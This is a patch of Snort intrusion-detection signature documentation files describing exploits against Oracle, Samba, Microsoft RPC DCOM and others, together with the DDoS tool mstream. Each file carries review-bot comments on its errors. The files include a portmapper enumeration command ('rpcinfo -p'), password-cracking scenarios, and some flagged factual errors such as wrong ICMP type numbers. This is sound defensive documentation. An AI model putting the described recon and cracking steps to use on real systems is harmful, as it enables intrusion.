+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code.
+
+--
+Detailed Information:
+Certain versions of the NextFTP client from ToxSoft contain a programming error that allows an FTP server to issue commands on the client via exploit code in the server reply.
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Use Secure Shell (ssh) for file transfer as opposed to FTP.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0671
+
+Bugtraq:
+http://www.securityfocus.com/bid/572
+
+--
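Review bot: "System compromize" under Impact should be "System compromise". "Attack Scenarios" does not describe a scenario, it only repeats "Exploit scripts are available" from Ease of Attack; describe the actual scenario from Detailed Information (a malicious or compromised FTP server returning an oversized reply to the connecting NextFTP client). The file also lacks "Affected Systems"; add the NextFTP versions given in the Bugtraq reference.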
--- /dev/null
+++ b/doc/signatures/2861.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2861
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_nchar
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
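Review bot: the procedure name is split across lines with a dangling period: "vulnerability in the procedure add_priority_nchar" followed by ". This procedure is included in" should be joined into one sentence. Also "Oracle Oracle9i" under Affected Systems duplicates the vendor name, several "-- " separators carry trailing whitespace, and "Additional References" is empty for a named vulnerable package (sys.dbms_repcat_conf); add the vendor advisory or Bugtraq reference.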
--- /dev/null
+++ b/doc/signatures/1065.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1065
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
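Review bot: "attackers choosing" under Impact should be "attacker's choosing". The rest is the generic web-server template shared with other files; since the text never says what request pattern SID 1065 matches, add one sentence under "Detailed Information" identifying it, otherwise this file is indistinguishable from the other generic web entries in this patch.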
--- /dev/null
+++ b/doc/signatures/452.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+
+Sid:
+452
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Timestamp Reply with an invalid or undefined ICMP Code.
+
+--
+
+Impact:
+Information-gathering.  An ICMP Timestamp Reply message is sent in response to an ICMP Timestamp Request message.  If the ICMP Timestamp Reply message reaches the requesting host it indicates that the replying host is alive.  Most OS's (operating systems) will accept an ICMP Timestamp Reply message with an invalid or undefined ICMP code set as a valid ICMP Timestamp Reply.
+
+--
+
+Detailed Information:
+ICMP Type 0 Code 0 is the RFC defined messaging type for ICMP Timestamp Reply datagrams.  This type of message is used to determine if a host is active on the network.
+
+If ICMP type 8 (echo) traffic is filtered at a firewall, an attacker may try to use type 14 (timestamp) as an alternative.
+
+--
+
+Attack Scenarios:
+Remote attackers my generate ICMP Timestamp Reply datagrams with invalid ICMP Codes in an attempt to cause faults in the applications or hosts generating ICMP Timestamp Requests.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Use ingress filtering to prevent ICMP Type 0 messages from entering the network.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
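Review bot: the ICMP type numbers in Detailed Information and Corrective Action are wrong: "ICMP Type 0 Code 0 is the RFC defined messaging type for ICMP Timestamp Reply datagrams" is incorrect, since per RFC 792 Type 0 is Echo Reply, Timestamp Request is Type 13 and Timestamp Reply is Type 14. Correspondingly "an attacker may try to use type 14 (timestamp) as an alternative" should say type 13 (timestamp request), and "prevent ICMP Type 0 messages from entering the network" should refer to Type 14 (or to blocking Type 13 requests), to match what this rule actually detects. Also "Remote attackers my generate" should be "may generate".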
--- /dev/null
+++ b/doc/signatures/3037.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3037
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
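Review bot: "heterogenous" should be "heterogeneous", and "on the remote server.The problem" is missing a space after the period. "Additional References" is empty even though Affected Systems pins this to "Samba 3.0.8 and prior"; add the Samba security advisory for the ACL integer overflow described in Attack Scenarios. Several "-- " separators carry trailing whitespace.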
--- /dev/null
+++ b/doc/signatures/3116.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3116
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
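Review bot: there is a stray blank line between "-- " and "Corrective Action:" that the other sections do not have, and "Additional References" is empty; add the Microsoft security bulletin for the License Logging Service overflow. Under Affected Systems, "Microsoft Windows Server 2000" should be the product name "Microsoft Windows 2000 Server".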
--- /dev/null
+++ b/doc/signatures/705.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+705
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
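Review bot: "Affected Systems" is empty; list the Microsoft SQL Server versions this rule applies to, or state "All versions". "Additional References" is also empty. The Summary says "Microsoft SQL" while Detailed Information refers to "Microsoft SQL server or client"; use the product name "Microsoft SQL Server" consistently.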
--- /dev/null
+++ b/doc/signatures/3133.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3133
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the processing of a Portable Network Graphics (PNG) file by
+the GD Graphics Library.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+A vulnerability exists in the way that software that handles PNG files,
+libpng, allocates memory for PNG images. A maliciously formatted PNG
+image sent to a vulnerable server may cause a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.  A
+PNG file with an excessively large image height, width, or depth, or
+combination of these can cause a buffer overflow.
+
+--
+Affected Systems:
+	GD Graphics Library 2.0.28 and earlier
+
+--
+Attack Scenarios:
+An attacker can create a malformed PNG file and upload it to a web server,
+possibly causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
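Review bot: the file is inconsistent about which library is vulnerable: Summary and Affected Systems name the GD Graphics Library ("GD Graphics Library 2.0.28 and earlier"), but Detailed Information says "software that handles PNG files, libpng, allocates memory for PNG images". State explicitly that GD reads PNG images through libpng and that the affected versions refer to GD, so the reader knows which package to patch. "Additional References" is empty; add the advisory.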
--- /dev/null
+++ b/doc/signatures/886.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+886
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
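Review bot: "running ona web server" should be "running on a web server", "attackers choosing" should be "attacker's choosing" (Impact and Detailed Information), and the line "relationships between the victim server and other hosts can be exploited by the attacker." runs past the wrap width used elsewhere in the file; rewrap. "Additional References" is empty.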
--- /dev/null
+++ b/doc/signatures/122-6.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-6
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a tcp
+filtered decoy portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
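Review bot: the file starts with two blank lines before "Rule:" while the other files begin with it on the first line; "reconnaisance" should be "reconnaissance", "consititute" should be "constitute", and "Apply any appropriate vendor supplied patches as appropriate" repeats "appropriate". The Summary's "tcp filtered decoy portscan" is never defined here; a one-line explanation (a scan in which probes arrive from spoofed decoy sources and the probed ports do not answer, so they appear filtered) would spare the reader a trip to README.sfportscan.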
--- /dev/null
+++ b/doc/signatures/1280.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1280
+
+--
+Summary:
+This event is generated when an attempt is made dump entries from the portmapper.
+
+--
+Impact:
+Information disclosure.  This request can discover what Remote Procedure Call (RPC) services are offered and on what ports they listen. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts.  It can be queried for all RPC services running, the RPC program name and version, the protocol (TCP or UDP), and the port where the service listens.  This can provide an attacker valuable information about which RPC services offered and on which ports.
+
+--
+Affected Systems:
+All hosts running portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover RPC services and their associated listening ports. 
+
+--
+Ease of Attack:
+Simple. Execute 'rpcinfo -p hostname/IP'.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS429
+
+
+--
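Review bot: The Summary is missing a word: "an attempt is made dump entries from the portmapper" should read "an attempt is made to dump entries from the portmapper". In Detailed Information, "which RPC services offered" needs "are" ("which RPC services are offered and on which ports"). Since Ease of Attack says the attack is simply running 'rpcinfo -p hostname/IP', the False Positives section ("None Known.") should mention that an administrator running the same query from a monitored network will trigger this rule.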
--- /dev/null
+++ b/doc/signatures/1979.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1979
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
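Review bot: Additional References is empty for a rule whose Ease of Attack says "Exploits exist" and whose Detailed Information says "Many known vulnerabilities exist"; at least one reference should be supplied, or the section should state that none apply. The Summary is also generic ("a known vulnerability on a web server") and never says what request pattern the rule matches, which leaves an analyst unable to judge the event. Minor: "attackers choosing" in Impact should be "attacker's choosing".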
--- /dev/null
+++ b/doc/signatures/2393.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2393
+
+--
+Summary:
+This event is generated when an attempt is made to access the /_admin directory.
+
+--
+Impact:
+Unauthorized file upload or information gathering.  This can allow an attacker to upload unauthorized files to the web server or information disclosure.
+
+--
+Detailed Information:
+A vulnerability exists in the jbrowser web-based image gallery software that allows unchecked access to the _admin directory, possibly permitting an attacker to execute scripts found in this directory.  Execution of admin scripts upload.php3 and upload_ftp.php3 may allow the attacker to upload malicious files to the server or replace existing files.  Execution of the list_all.php script may allow an attacker to display files in directories, including those not in the web server root directory.
+
+--
+Affected Systems:
+Not reported.
+
+--
+Attack Scenarios:
+An attacker can craft a URL to execute the upload.php3, upload_ftp.php3, and list_all.php scripts to upload files or examine files on the vulnerable server. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Restrict access to the '_admin' directory to authorized users only. 
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+bugtraq
+http://www.securityfocus.com/bid/9537
+
+nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=12032
+
+--
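Review bot: "Affected Systems: Not reported." contradicts the Detailed Information, which names the jbrowser web-based image gallery software as the vulnerable product; Affected Systems should at least list jbrowser. Style: the reference labels are inconsistent ("bugtraq" without a colon, "nessus:" with one); the other files in this patch use "Label:".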
--- /dev/null
+++ b/doc/signatures/3183.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3183
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
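Review bot: "Expoit" in Ease of Attack is a typo for "Exploit". Additional References is empty even though the Summary names a specific Microsoft RPC DCOM vulnerability and Corrective Action says "Apply the appropriate vendor supplied patches"; the vendor bulletin and the CVE entry should be cited. The Attack Scenarios text ("a request for a file with an overly long filename via a network share") is not connected to the malformed RPC request described in Detailed Information; one sentence explaining how the long filename reaches the RPC port would make the scenario readable.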
--- /dev/null
+++ b/doc/signatures/2608.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2608
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in useful
+tasks. The "check_ddl_text" procedure contains a programming error
+that may allow an attacker to execute a buffer overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the second variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
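Review bot: The paragraph "If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of "any"" is rule-tuning advice about the sensor's port variable, not a description of the vulnerability, and it sits under Detailed Information; move it to Corrective Action (or a tuning note) and say that it is the rule's port variable so it is not mistaken for an Oracle setting. Also "a Oracle database" should be "an Oracle database", and Attack Scenarios refers to "the second variable" without saying which parameter of check_ddl_text that is.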
--- /dev/null
+++ b/doc/signatures/250.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+250
+
+--
+Summary:
+The event is generated when a DDoS mstream handler responds to an mstream client.
+
+--
+Impact:
+Severe.  If the source IP is in your network, it is possibly an mstream handler.  If the destination IP is in your network, it is possibly an mstream client.
+
+--
+Detailed Information:
+The mstream DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. At the highest level, clients communicate with handlers to direct them to launch attacks.  A client may contact a handler using a TCP SYN packet to destination port 15104.  A listening handler would respond to this on source port 15104 with a string of ">" in the payload.
+
+--
+Affected Systems:
+Any mstream compromised host.
+
+--
+Attack Scenarios:
+After a host becomes an mstream handler, the client will attempt to communicate with the handler.  A handler will respond to this communication.
+
+
+--
+Ease of Attack:
+Simple. mstream code is freely available.
+
+--
+False Positives:
+A legitimate server port of 15104 will cause this rule to fire.  This rule may also generate a false positive if port 15104 is selected as an FTP data port.
+
+--
+False Negatives:
+There are other known client-to-handler ports in addition to 15104.
+
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+
+--
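Review bot: The "--" separator is missing between False Negatives and Corrective Action ("Corrective Action:" follows the False Negatives text after only a blank line); every other section in this file, and in the other files of this patch, is introduced by "--", and tooling that splits on the separator will merge the two sections. The False Negatives text also says "There are other known client-to-handler ports in addition to 15104" without listing them; naming them would let an analyst check coverage.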
--- /dev/null
+++ b/doc/signatures/356.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 356
+
+-- 
+
+Summary:
+This event is generated when an attempt to retrieve a specific file, in this case the systems user database from an FTP server is made.
+
+-- 
+Impact: 
+Serious. The attacker may obtain a valid list of user names and/or encrypted passwords from the server.
+
+--
+Detailed Information:
+This event is generated when an attempt to download a copy of the "passwd" file from the server is made.
+
+The UNIX "passwd" file (typically located in "/etc/" directory) is used to hold the authentication information for system logins. This file needs to be readable by all system users. 
+
+Where shadow passwords are used, the actual encrypted passwords are stored in a separate file, only readable by root. It is possible to use various password cracking tools to obtain unencrypted passwords either by trying random character combinations, a predefined word list or a combination of public user information. The attacker may use the information contained in the passwd file to launch a dictionary attack against the victim host or other hosts the same users may have access to.
+
+--
+Attack Scenarios: 
+The attacker downloads a "passwd" file from a machine that does not use shadowed passwords and uses a tool like John-the-Ripper to crack the passwords used for several accounts. He then proceeds to login to the system remotely and possibly gain escalated privileges via a local exploit on the system.
+
+-- 
+
+Ease of Attack: 
+Simple. The attack usually requires FTP access to the /etc/ directory either by system misconfiguration or via a directory traversal technique. Also, in the rare circumstances the system administrator may have accidentally left a copy of a "passwd" file in a directory accessible for anonymous or other FTP users, which presents a high security risk and simplifies the attack.
+
+-- 
+
+False Positives: 
+If the string "passwd" is contained within an otherwise innocuous filename being retrieved from a server, the rule will generate an event. 
+
+Also, the anonymous FTP account often has a separate password file within the chrooted anonymous FTP directory (e.g. /var/ftp/etc/passwd). This file does not usually contain valid system usernames and passwords. While technically not a false positive, this may be considered a false alarm.
+
+--
+
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Identify the downloaded file and confirm that it indeed a valid system password file. Change the user passwords on the system and notify the users.
+
+Ensure that FTP access to sensitive system files is not allowed.
+
+--
+Contributors: 
+Original rule writer Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS319
+
+--
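Review bot: This file has no "Affected Systems" section, which the other files place between Detailed Information and Attack Scenarios. Its formatting also diverges from the rest of the patch: the Sid is on the same line as its label ("Sid: 356" rather than "Sid:" followed by "356"), several "--" separators carry trailing whitespace and are followed by a blank line before the section name, and "confirm that it indeed a valid system password file" is missing "is".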
--- /dev/null
+++ b/doc/signatures/2418.txt
@@ -0,0 +1,54 @@
+Rule:  
+
+--
+Sid:
+
+--
+Summary:
+This event is generated when an attempt is made to connect to a
+Microsoft Terminal Server without using encryption.
+
+--
+Impact:
